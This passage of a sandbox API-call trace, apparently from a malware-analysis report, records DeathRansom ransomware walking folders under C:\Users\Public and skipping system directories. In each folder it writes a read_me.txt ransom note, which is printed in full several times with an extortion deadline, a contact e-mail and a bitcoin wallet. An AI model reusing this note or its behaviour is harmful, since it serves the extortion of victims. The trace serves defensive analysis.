ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x940000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="win7_scenic-demoshort_raw.wtv", cAlternateFileName="WIN7_S~1.WTV")) returned 0 [0077.014] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0077.014] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\read_me.txt") returned 56 [0077.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\read_me.txt" (normalized: "c:\\users\\public\\recorded tv\\sample media\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c8 [0077.054] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0077.054] WriteFile (in: hFile=0x7c8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0077.055] CloseHandle (hObject=0x7c8) returned 1 [0077.055] GetProcessHeap () returned 0x4f10000 [0077.055] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e71148 | out: hHeap=0x4f10000) returned 1 [0077.055] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="sample media", cAlternateFileName="SAMPLE~1")) returned 0 [0077.055] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0077.055] wnsprintfW (in: pszDest=0x8e51138, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\read_me.txt") returned 43 [0077.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\read_me.txt" (normalized: "c:\\users\\public\\recorded tv\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x794 [0077.100] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0077.100] WriteFile (in: hFile=0x794, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0077.101] CloseHandle (hObject=0x794) returned 1 [0077.102] GetProcessHeap () returned 0x4f10000 [0077.102] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e51138 | out: hHeap=0x4f10000) returned 1 [0077.102] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Videos", cAlternateFileName="")) returned 1 [0077.102] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos") returned 26 [0077.102] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0077.102] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0077.102] StrStrW (lpFirst="videos", lpSrch="programdata") returned 0x0 [0077.102] StrStrW (lpFirst="videos", lpSrch="$recycle.bin") returned 0x0 [0077.102] StrStrW (lpFirst="videos", lpSrch="program files") returned 0x0 [0077.102] StrStrW (lpFirst="videos", lpSrch="windows") returned 0x0 [0077.102] StrStrW (lpFirst="videos", lpSrch="all users") returned 0x0 [0077.102] StrStrW (lpFirst="videos", lpSrch="appdata") returned 0x0 [0077.102] GetProcessHeap () returned 0x4f10000 [0077.102] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e51138 [0077.102] lstrcpyW (in: lpString1=0x8e51138, lpString2="\\\\?\\C:\\Users\\Public\\Videos" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos") returned="\\\\?\\C:\\Users\\Public\\Videos" [0077.102] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 138 [0077.102] QueueUserWorkItem (Function=0x40a710, Context=0x8e51138, Flags=0x0) returned 1 [0077.102] GetProcessHeap () returned 0x4f10000 [0077.102] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e71148 [0077.102] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\*") returned 28 [0077.102] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x25539a20, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x25539a20, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0077.102] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\.") returned 28 [0077.103] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0077.103] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.103] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x25539a20, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x25539a20, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0077.103] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\..") returned 29 [0077.103] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.103] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0077.103] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini") returned 38 [0077.103] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25539a20, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x25539a20, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x25539a20, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0077.103] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\read_me.txt") returned 38 [0077.103] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 1 [0077.103] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos") returned 40 [0077.103] lstrcmpW (lpString1="Sample Videos", lpString2="..") returned 1 [0077.103] lstrcmpW (lpString1="Sample Videos", lpString2=".") returned 1 [0077.103] StrStrW (lpFirst="sample videos", lpSrch="programdata") returned 0x0 [0077.103] StrStrW (lpFirst="sample videos", lpSrch="$recycle.bin") returned 0x0 [0077.103] StrStrW (lpFirst="sample videos", lpSrch="program files") returned 0x0 [0077.103] StrStrW (lpFirst="sample videos", lpSrch="windows") returned 0x0 [0077.103] StrStrW (lpFirst="sample videos", lpSrch="all users") returned 0x0 [0077.103] StrStrW (lpFirst="sample videos", lpSrch="appdata") returned 0x0 [0077.103] GetProcessHeap () returned 0x4f10000 [0077.103] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e81150 [0077.104] lstrcpyW (in: lpString1=0x8e81150, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos" [0077.104] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 139 [0077.104] QueueUserWorkItem (Function=0x40a710, Context=0x8e81150, Flags=0x0) returned 1 [0077.104] GetProcessHeap () returned 0x4f10000 [0077.104] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e91158 [0077.105] wnsprintfW (in: pszDest=0x8e91158, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*") returned 42 [0077.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0077.106] wnsprintfW (in: pszDest=0x8e91158, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\.") returned 42 [0077.106] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0077.106] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.106] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0077.106] wnsprintfW (in: pszDest=0x8e91158, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\..") returned 43 [0077.106] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.106] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be12937, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0077.106] wnsprintfW (in: pszDest=0x8e91158, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned 52 [0077.106] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Wildlife.wmv", cAlternateFileName="")) returned 1 [0077.106] wnsprintfW (in: pszDest=0x8e91158, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned 53 [0077.106] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Wildlife.wmv", cAlternateFileName="")) returned 0 [0077.106] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0077.106] wnsprintfW (in: pszDest=0x8e91158, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\read_me.txt") returned 52 [0077.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\read_me.txt" (normalized: "c:\\users\\public\\videos\\sample videos\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x774 [0077.106] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0077.106] WriteFile (in: hFile=0x774, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0077.107] CloseHandle (hObject=0x774) returned 1 [0077.107] GetProcessHeap () returned 0x4f10000 [0077.107] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e91158 | out: hHeap=0x4f10000) returned 1 [0077.107] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="sample videos", cAlternateFileName="SAMPLE~1")) returned 0 [0077.108] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0077.108] wnsprintfW (in: pszDest=0x8e71148, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\read_me.txt") returned 38 [0077.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\read_me.txt" (normalized: "c:\\users\\public\\videos\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.108] GetProcessHeap () returned 0x4f10000 [0077.108] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e71148 | out: hHeap=0x4f10000) returned 1 [0077.108] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="videos", cAlternateFileName="")) returned 0 [0077.108] FindClose (in: hFindFile=0x7cfe9a8 | out: hFindFile=0x7cfe9a8) returned 1 [0077.108] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\read_me.txt") returned 31 [0077.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\read_me.txt" (normalized: "c:\\users\\public\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7fc [0077.108] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0077.108] WriteFile (in: hFile=0x7fc, lpBuffer=0x4f55310*, 